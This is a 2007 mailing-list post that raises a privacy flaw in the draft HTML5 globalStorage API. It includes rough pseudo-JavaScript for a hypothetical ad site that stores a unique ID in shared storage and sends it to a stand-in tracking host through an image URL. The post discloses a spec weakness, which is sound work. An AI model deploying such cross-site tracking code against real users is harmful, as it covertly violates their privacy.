- From: Jerason Banes <jbanes@gmail.com>
- Date: Thu, 31 May 2007 00:13:56 -0500
Hello All! This is my first post here, so apologies in advance if I'm not quite up on the list etiquette. I was just comparing the Storage API with that of the Google Gears<http://gears.google.com>, and something jumped out at me. According to the spec, browsers should allow a webapp to store data in the globalStorage object with no domain attached. (i.e. globalStorage['']) This is intended to allow data to be shared across all webpages. My concern is that this poses a problem for the user's privacy. Let's say that I'm an Evil Advertisement site. It is in my interest to penetrate the user's veil of privacy and determine which pages they visit. I've traditionally used cookies for this, but the browser makers foiled my attempts by allowing cookies to only be accepted from the originating site. But thanks to the new globalStorage API, I can store a Unique ID in the user's browser, then use Javascript to retrieve it every time they download one of my ads. Here's some rough psuedo-js to demonstrate how it might work: <script> if(!gloabalStorage[''].evilbit) gloabalStorage[''].evilbit = createUUID(); var createUUID() { //return a unique identifier using a random algorithm. } var displayEvilAd(type) { document.write('<img src="http://www.eviladagency.com' + '/getAdvertisement.asp' + '?type=' + type + '&tracking=' + gloabalStorage[''].evilbit+'">'); } </script> ... <script>displayEvilAd("banner");</script> Is there something I'm missing that would prevent this? Thanks, Jerason Banes -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://lists.whatwg.org/pipermail/whatwg-whatwg.org/attachments/20070531/17461fdd/attachment.htm>
Received on Wednesday, 30 May 2007 22:13:56 UTC